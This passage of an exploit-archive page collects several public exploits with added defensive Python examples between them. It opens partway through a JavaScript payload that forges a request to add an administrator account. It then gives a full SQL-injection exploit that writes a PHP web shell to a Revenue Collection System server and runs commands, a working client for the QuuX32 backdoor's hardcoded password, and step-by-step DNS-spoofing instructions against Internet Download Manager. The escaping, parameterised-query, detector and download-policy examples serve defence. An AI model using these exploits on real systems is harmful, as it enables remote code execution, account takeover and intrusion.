"http://localhost/rates/admin/usersadd.php";<br />var req = new XMLHttpRequest();<br />req.open("GET", target);<br />req.send();<br />var parser = new DOMParser();<br />resp = req.responseText<br />var document = parser.parseFromString(resp, "text/html");<br />var token = document.getElementsByName("token")[0].value;<br />var params = "token="+token+"&t=users&action=insert&&modal=0&x_Fullname=test&x_Username=admin_new&x__Email=test123%40test123.com&x_Passsword=Test123Test123&x_userLevelId=-1";<br />req.open("POST", target);<br />req.withCredentials = true;<br />req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");<br />req.send(params);<br /></script><br /></code></pre>
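<p>Added example covering both cross-site scripting entries on this page (the ClicShopping reflected parameter name and the Revenue Collection stored help message); it is not code from either product. Each vulnerable rendering pattern is paired with its escaped form, and the standard-library HTML parser is used to show what a browser's tokenizer would produce: a new event-handler attribute when a quote inside an attribute value is not encoded, and a script element when element content is not encoded. The templates and payload strings are constructed for the example.</p>

```python
"""Escape untrusted input for the HTML context it lands in.

Added example, not code from ClicShopping or the Revenue Collection System.
html.escape(quote=True) covers the double-quoted attribute context; plain
html.escape covers element content. The parser-based checks show which
attributes and tags the untrusted input managed to introduce.
"""
import html
from html.parser import HTMLParser
from typing import Dict, List, Tuple


class TagCollector(HTMLParser):
    """Collect (tag, attributes) for every start tag, as a browser tokenizer would."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: List[Tuple[str, Dict[str, str]]] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, {k: (v or "") for k, v in attrs}))


def parse_tags(markup: str) -> List[Tuple[str, Dict[str, str]]]:
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


# --- reflected: a request parameter *name* echoed into a double-quoted attribute ---

def render_search_field_unsafe(param_name: str) -> str:
    return f'<input type="text" name="{param_name}" />'


def render_search_field(param_name: str) -> str:
    # quote=True turns '"' into &quot; so the attribute cannot be closed early
    return f'<input type="text" name="{html.escape(param_name, quote=True)}" />'


# --- stored: a user-supplied message later shown to an administrator ---

def render_message_unsafe(message: str) -> str:
    return f'<div class="message">{message}</div>'


def render_message(message: str) -> str:
    # element-content escaping neutralises < > and &, so no new tag can start
    return f'<div class="message">{html.escape(message)}</div>'


# constructed inputs modelled on the two advisories
REFLECTED_PAYLOAD = 'bel9c"onmouseover="alert(1)'
STORED_PAYLOAD = '<script>alert(1)</script>'


def injected_attributes(markup: str) -> List[str]:
    """Event-handler attributes present on the first tag of the markup."""
    _tag, attrs = parse_tags(markup)[0]
    return [k for k in attrs if k.startswith("on")]


def injected_tags(markup: str) -> List[str]:
    """Tags other than the single div the message template is supposed to emit."""
    return [tag for tag, _ in parse_tags(markup) if tag != "div"]


if __name__ == "__main__":
    print(render_search_field_unsafe(REFLECTED_PAYLOAD), injected_attributes(render_search_field_unsafe(REFLECTED_PAYLOAD)))
    print(render_search_field(REFLECTED_PAYLOAD), injected_attributes(render_search_field(REFLECTED_PAYLOAD)))
    print(render_message_unsafe(STORED_PAYLOAD), injected_tags(render_message_unsafe(STORED_PAYLOAD)))
    print(render_message(STORED_PAYLOAD), injected_tags(render_message(STORED_PAYLOAD)))
```

<p>The escaped attribute still round-trips the original string (the parser unescapes &amp;quot; back to a quote inside the value), which is why output encoding rather than input filtering is the right fix: the data is preserved, only its ability to change the markup structure is removed. A Content-Security-Policy that disallows inline handlers and inline scripts is a useful second layer for both cases.</p>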
<pre><code># Exploit Title: Revenue Collection System v1.0 - RCE via Unauthenticated SQL Injection<br /># Exploit Author: Joe Pollock<br /># Date: November 16, 2022<br /># Vendor Homepage: https://www.sourcecodester.com/php/14904/rates-system.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/rates.zip<br /># Tested on: Kali Linux, Apache, Mysql<br /># CVE: T.B.C<br /># Vendor: Kapiya<br /># Version: 1.0<br /># Exploit Description:<br /># Revenue Collection System v1.0 suffers from an unauthenticated SQL Injection Vulnerability, in step1.php, allowing remote attackers to <br /># write a malicious PHP file to disk. The resulting file can then be accessed within the /rates/admin/DBbackup directory.<br /># This script will write the malicious PHP file to disk, issue a user-defined command, then retrieve the result of that command.<br /># Ex: python3 rcsv1.py 10.10.14.2 "ls"<br /><br />import sys, requests<br />def main():<br /> if len(sys.argv) != 3:<br /> print("(+) usage: %s <target> <cmd>" % sys.argv[0])<br /> print('(+) eg: %s 192.168.121.103 "ls"' % sys.argv[0])<br /> sys.exit(-1)<br /><br /> targetIP = sys.argv[1]<br /> cmd = sys.argv[2]<br /> s = requests.Session()<br /> <br /> # Define obscure filename and command parameter to limit exposure and usage of the RCE.<br /> FILENAME = "youcantfindme.php"<br /> CMDVAR = "ohno"<br /> <br /> # Define the SQL injection string<br /> sqli = """'+UNION+SELECT+"<?php+echo+shell_exec($_GET['%s']);?>","","","","","","","","","","","","","","","",""+INTO+OUTFILE+'/var/www/html/rates/admin/DBbackup/%s'--+-""" % (CMDVAR,FILENAME)<br /> <br /> # Write the PHP file to disk using the SQL injection vulnerability<br /> url1 = "http://%s/rates/index.php?page=step1&proId=%s" % (targetIP,sqli)<br /> r1 = s.get(url1)<br /> <br /> # Execute the user defined command and display the result<br /> url2 = "http://%s/rates/admin/DBbackup/%s?%s=%s" % (targetIP,FILENAME,CMDVAR,cmd)<br /> r2 = 
s.get(url2)<br /> print(r2.text)<br /> <br />if __name__ == '__main__':<br /> main()<br /></code></pre>
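<p>Added example; it is not the Revenue Collection System's code. The vulnerable function mirrors the pattern the advisory describes for step1.php (the proId request parameter concatenated into a WHERE clause) against an in-memory SQLite table, and the two hardened variants show what a bound parameter and an up-front shape check each buy. SQLite has no INTO OUTFILE, so the file-write half of the advisory is not reproduced; on MySQL that half is additionally contained by secure_file_priv and by not granting the FILE privilege to the web application's database user. Table layout, sample rows and function names are constructed.</p>

```python
"""String-built SQL beside a parameterised query, on an in-memory SQLite table.

Added example, not the application's code. lookup_unsafe splices the request
parameter into the SQL text; lookup_parameterised binds it; lookup_safe also
validates that it looks like an integer id before binding.
"""
import re
import sqlite3
from typing import List, Tuple

# constructed sample data standing in for the application's property table
SAMPLE_ROWS = [(1, "alice", 120.0), (2, "bob", 80.5), (3, "carol", 99.9)]


def setup_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE properties (proId INTEGER PRIMARY KEY, owner TEXT, rate REAL)")
    conn.executemany("INSERT INTO properties VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_unsafe(conn: sqlite3.Connection, pro_id: str) -> List[Tuple[int, str]]:
    """Vulnerable: the request parameter becomes part of the SQL text."""
    query = f"SELECT proId, owner FROM properties WHERE proId = '{pro_id}'"
    return conn.execute(query).fetchall()


def lookup_parameterised(conn: sqlite3.Connection, pro_id: str) -> List[Tuple[int, str]]:
    """Bound parameter: whatever the string contains, it is compared as a value."""
    return conn.execute(
        "SELECT proId, owner FROM properties WHERE proId = ?", (pro_id,)
    ).fetchall()


def lookup_safe(conn: sqlite3.Connection, pro_id: str) -> List[Tuple[int, str]]:
    """Validate the shape of the parameter first, then bind it as an integer."""
    if not re.fullmatch(r"[1-9][0-9]{0,9}", pro_id):
        raise ValueError("proId must be a positive integer")
    return conn.execute(
        "SELECT proId, owner FROM properties WHERE proId = ?", (int(pro_id),)
    ).fetchall()


# constructed inputs: a normal client value and two classic injection shapes
BENIGN = "2"
TAUTOLOGY = "' OR '1'='1"
UNION = "' UNION SELECT 99, 'injected' -- "

if __name__ == "__main__":
    db = setup_db()
    for value in (BENIGN, TAUTOLOGY, UNION):
        print("unsafe        ", repr(value), lookup_unsafe(db, value))
        print("parameterised ", repr(value), lookup_parameterised(db, value))
        try:
            print("safe          ", repr(value), lookup_safe(db, value))
        except ValueError as exc:
            print("safe          ", repr(value), "rejected:", exc)
```

<p>The parameterised query alone already defeats both injection shapes; the extra validation in lookup_safe matters for logging and for failing loudly, since a request whose proId is not an integer is never a legitimate client request and is worth an alert rather than a silent empty result.</p>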
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/13ce53de9ca4c4e6c58f990b442cb419.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Quux<br />Vulnerability: Weak Hardcoded Credentials<br />Family: Quux<br />Type: PE32<br />MD5: 13ce53de9ca4c4e6c58f990b442cb419<br />Vuln ID: MVID-2022-0656<br />Dropped files: quux32.exe<br />Disclosure: 11/15/2022<br />Description: The malware listens on TCP port 3. Authentication is required, but the password "Faraon" (Romanian for "Pharaoh") is weak and hardcoded in cleartext within the PE file. Third-party adversaries who can reach an infected host can call the commands made available by the backdoor, which include uploading files and code execution. A custom client is needed to communicate with the infected host, as nc64.exe and telnet send LF characters and will fail authentication when sending credentials containing "\n" etc. 
Once connected if we send any files they will be written to Windows\System unless calling the "SetCurrDir" commmand.<br /><br />0040AD24 ; char aFaraon[]<br />0040AD24 aFaraon db 'Faraon',0 ; DATA XREF _WinMain@16_0+376↑o<br />0040AD2B align 100h<br /><br />[Commands]<br />SetCurrDir<br />GetCurrDir<br />GetCurrentDirectory<br />Exec<br />GetFile<br />SendFile<br />quit<br />exit<br />shutdown<br />dir<br />CreateFile<br />DeleteFile<br />MessageBox<br />die<br /><br /><br />Exploit/PoC:<br />"quux32_xploit.py"<br /><br />from socket import *<br />import time, sys<br /><br />BANNER="""<br /> ____ ____ ___ ____ __ _ __ <br /> / __ \__ ____ ____ __ |_ /|_ | / __/_ __ ___ / /__ (_) /_<br />/ /_/ / // / // /\ \ /_/_ </ __/ / _/ \ \ // _ \/ / _ \/ / __/<br />\___\_\_,_/\_,_//_\_\/____/____/ /___//_\_\/ .__/_/\___/_/\__/ <br /> /_/ <br /> By Malvuln<br /> MVID-2022-0656 - Nov 2022<br />"""<br /><br />MALWARE_HOST=""<br />PORT=3<br />CREDZ="Faraon"<br /><br />def chk_res(s):<br /> res=""<br /> while True:<br /> res += s.recv(512).decode()<br /> if "#" in res or "\0" in res or "\n" in res or ":" in res:<br /> break<br /> return res<br /><br />def auth():<br /> s=socket(AF_INET, SOCK_STREAM)<br /> s.connect((MALWARE_HOST, PORT))<br /><br /> #Authenticate<br /> s.send(CREDZ.encode())<br /> time.sleep(0.5)<br /> return s<br /><br />def upload(the_file):<br /> <br /> s = auth()<br /> <br /> PAYLOAD="GetCurrentDirectory"<br /> s.send(PAYLOAD.encode())<br /> time.sleep(0.5)<br /> print(chk_res(s))<br /><br /> PAYLOAD="SetCurrDir"<br /> s.send(PAYLOAD.encode())<br /> time.sleep(0.5)<br /> print(chk_res(s))<br /><br /> PAYLOAD="C:\\Users\\Public"<br /> s.send(PAYLOAD.encode())<br /> time.sleep(0.5)<br /> print(chk_res(s))<br /> <br /> PAYLOAD="GetCurrentDirectory"<br /> s.send(PAYLOAD.encode())<br /> time.sleep(0.5)<br /> print(chk_res(s))<br /><br /> PAYLOAD="SendFile"<br /> s.send(PAYLOAD.encode())<br /> time.sleep(0.5)<br /> <br /> PAYLOAD=the_file<br /> 
s.send(PAYLOAD.encode())<br /> time.sleep(0.5)<br /><br /> PAYLOAD="Exec"<br /> s.send(PAYLOAD.encode())<br /> time.sleep(0.5)<br /> <br /> PAYLOAD=the_file<br /> s.send(PAYLOAD.encode())<br /> time.sleep(0.5)<br /> print(chk_res(s))<br /> print("[+] Uploading: "+the_file)<br /> <br /> time.sleep(2)<br /> s.close()<br /><br />def isIP(ip):<br /> try:<br /> inet_aton(ip)<br /> return True<br /> except Exception as e:<br /> return False<br /><br />def execute(program):<br /><br /> s = auth()<br /> PAYLOAD="Exec"<br /> s.send(PAYLOAD.encode())<br /> time.sleep(0.5)<br /><br /> PAYLOAD=program<br /> s.send(PAYLOAD.encode())<br /> time.sleep(0.5)<br /> print(chk_res(s))<br /> print("[+] Executing: "+program)<br /><br />def kill_srv():<br /><br /> s = auth()<br /> print(chk_res(s))<br /> PAYLOAD="die"<br /> s.send(PAYLOAD.encode())<br /> time.sleep(0.5)<br /> print("[+] Backdoor terminated!")<br /><br /> <br />if __name__=="__main__":<br /> print(BANNER)<br /> if len(sys.argv) == 3:<br /> MALWARE_HOST=sys.argv[1]<br /> CMD = sys.argv[2]<br /> if isIP(MALWARE_HOST):<br /> if CMD=="1":<br /> _file=input("[-] File to upload: > ")<br /> if _file:<br /> upload(_file)<br /> else:<br /> exit(1)<br /> elif CMD=="2":<br /> pgm=input("[-] Program to run: > ")<br /> if pgm:<br /> execute(pgm)<br /> else:<br /> exit(1)<br /> elif CMD=="3":<br /> choice=input("[-] Kill server? 1=Yes > ")<br /> if choice.lower()=="1":<br /> kill_srv()<br /> else:<br /> print("[!] Invalid IP!")<br /> exit(1)<br /> else:<br /> print("[*] QuuX32 Exploit Usage: \n[-]IP: x.x.x.x, Command (1=Upload file, 2=Exec program, 3=Kill server)")<br /> exit(1)<br /><br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
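As an added defensive example, not part of the Malvuln advisory: a small Python detector that flags the backdoor's handshake in TCP flow records. It keys on two facts from the advisory, the hard-coded "Faraon" string sent as the first client payload on TCP port 3 and the backdoor's command vocabulary; the flow records, the `Flow` type and the function names are constructed here.

```python
# Added example (not from the advisory): flag QuuX32 backdoor traffic in flow records.
# Indicators come from the advisory above: listener on TCP port 3, hard-coded
# authentication string "Faraon", and a fixed command vocabulary.
from dataclasses import dataclass

QUUX32_PORT = 3
QUUX32_CREDENTIAL = b"Faraon"
QUUX32_COMMANDS = {
    "SetCurrDir", "GetCurrDir", "GetCurrentDirectory", "Exec", "GetFile",
    "SendFile", "quit", "exit", "shutdown", "dir", "CreateFile",
    "DeleteFile", "MessageBox", "die",
}

@dataclass
class Flow:
    src: str
    dst: str
    dport: int
    payloads: list  # client->server payloads in order, as bytes

def classify_flow(flow):
    """Return (verdict, detail): 'backdoor_auth' when the first client payload on
    port 3 is the hard-coded credential, 'suspicious_cmd' when later payloads match
    the backdoor's command words without that handshake, else 'benign'."""
    if flow.dport != QUUX32_PORT or not flow.payloads:
        return ("benign", "")
    first = flow.payloads[0]
    cmds = [p.decode("latin-1") for p in flow.payloads[1:]]
    seen = [c for c in cmds if c in QUUX32_COMMANDS]
    if first == QUUX32_CREDENTIAL:
        return ("backdoor_auth", f"{flow.src}->{flow.dst}: commands {seen}")
    if seen:
        return ("suspicious_cmd", f"{flow.src}->{flow.dst}: commands {seen}")
    return ("benign", "")

def scan(flows):
    """Return only the non-benign flows as (verdict, detail) tuples."""
    return [r for r in (classify_flow(f) for f in flows) if r[0] != "benign"]

# Constructed sample flows (not real captures).
SAMPLE_FLOWS = [
    Flow("10.0.0.5", "10.0.0.9", 3, [b"Faraon", b"SetCurrDir", b"C:\\Users\\Public", b"Exec"]),
    Flow("10.0.0.5", "10.0.0.9", 3, [b"hello", b"dir"]),
    Flow("10.0.0.5", "10.0.0.9", 80, [b"GET / HTTP/1.1\r\n"]),
]

if __name__ == "__main__":
    for verdict, detail in scan(SAMPLE_FLOWS):
        print(f"[{verdict}] {detail}")
```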
<pre><code># Vulnerability Title: Internet Download Manager v6.41 Build 3 "Remote Code Execution via MITM" Vulnerability<br /># Date: 15.11.2022<br /># Author: M. Akil Gündoğan<br /># Contact: https://twitter.com/akilgundogan<br /># Vendor Homepage: https://www.internetdownloadmanager.com/<br /># Software Link: https://mirror2.internetdownloadmanager.com/idman641build3.exe?v=lt&filename=idman641build3.exe<br /># Version: v.6.41 Build 3<br /># Tested on: Windows 10 Professional x64<br /># PoC Video: https://youtu.be/0djlanUbfY4<br /><br />Vulnerability Description:<br />---------------------------------------<br />Some help files are missing from non-English versions of Internet Download Manager. Help files with the extension<br />".chm", prepared in the user's language, are downloaded from the internet, run, and displayed to the user. This download is<br />done over HTTP, which is an insecure protocol. An attacker on the local network can intercept the traffic with a MITM attack and<br />replace the ".chm" help file with a malicious ".chm" file. IDM runs ".chm" files automatically after downloading,<br />which allows the attacker to execute code remotely.<br /><br />IDM also uses HTTP to check for and download updates, so the attacker can present a fake update to the victim's system as if a new version were available.<br /><br />Since we used the Turkish version of IDM, our target address in the MITM attack was "http://www.internetdownloadmanager.com/languages/tut_tr.chm".<br /><br />Requirements:<br />---------------------------------------<br />The attacker and the victim must be on the same local network.<br />The victim's user account on the computer must have administrative privileges on the system. The attacker does not need administrator privileges!<br /><br />Step by step procedure:<br />---------------------------------------<br />1 - The attacker prepares a malicious CHM file.
You can read the article at "https://sevenlayers.com/index.php/316-malicious-chm" for that.<br />2 - A MITM attack is made against the target using Ettercap or Bettercap.<br />3 - The domains "internetdownloadmanager.com" and "*.internetdownloadmanager.com" are redirected to the attacker machine with DNS spoofing.<br />4 - A web server is run on the attacking machine, a "languages" directory is created, and the malicious ".chm" file with the<br /> same name (tut_tr.chm, or the file matching the language in use) is placed in it.<br />5 - When the victim opens Internet Download Manager and clicks the "Tutorials" button, the download starts and the malicious ".chm" file runs automatically when it finishes.<br /><br />Recommendations:<br />---------------------------------------<br />Developers should stop using insecure HTTP in their update and download modules. In addition, downloaded files<br />should not be run automatically; additional warning messages should be displayed to users.<br /><br />Special thanks: p4rs, ratio, blackcode, zeyd.can and all friends.<br />---------------------------------------<br /></code></pre>
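An added illustration of the recommendations above, not code from IDM or from the author: a help-file download policy that refuses plaintext HTTP, checks the file's SHA-256 against a digest shipped with the application, and returns a decision instead of launching the file. The URL is the one named in the advisory; the file bytes, the expected digest, the `fetch_stub` download stand-in and the function names are constructed assumptions.

```python
# Added example (not IDM code): the weak behaviour the advisory describes beside a
# hardened download policy. No network access: fetch_stub is a constructed stand-in
# so the policy logic can be exercised offline.
import hashlib
from urllib.parse import urlparse

# URL named in the advisory; the content and digest below are constructed.
HELP_URL_HTTP = "http://www.internetdownloadmanager.com/languages/tut_tr.chm"
HELP_URL_HTTPS = "https://www.internetdownloadmanager.com/languages/tut_tr.chm"
GOOD_CHM = b"ITSF constructed help file body"
EXPECTED_SHA256 = hashlib.sha256(GOOD_CHM).hexdigest()

def weak_policy(url, data):
    """As the advisory describes: scheme not checked, no integrity check, run after download."""
    return {"run": True, "reason": "downloaded, running automatically"}

def hardened_policy(url, data, expected_sha256=EXPECTED_SHA256):
    """Allow opening the help file only when it was fetched over TLS and its
    SHA-256 matches the digest shipped with the application."""
    parsed = urlparse(url)
    if parsed.scheme != "https":
        return {"run": False, "reason": f"refused plaintext scheme {parsed.scheme!r}"}
    digest = hashlib.sha256(data).hexdigest()
    if digest != expected_sha256:
        return {"run": False, "reason": "digest mismatch, file replaced in transit?"}
    # Even a verified file is not opened silently: the caller must prompt the user.
    return {"run": False, "prompt_user": True, "reason": "verified; ask before opening"}

def fetch_stub(url):
    """Constructed stand-in for the download. On the plaintext URL it returns
    tampered bytes, modelling the DNS-spoofing MITM from the advisory."""
    if url.startswith("http://"):
        return b"malicious replacement"
    return GOOD_CHM

if __name__ == "__main__":
    for url in (HELP_URL_HTTP, HELP_URL_HTTPS):
        data = fetch_stub(url)
        print(url, "weak:", weak_policy(url, data), "hardened:", hardened_policy(url, data))
```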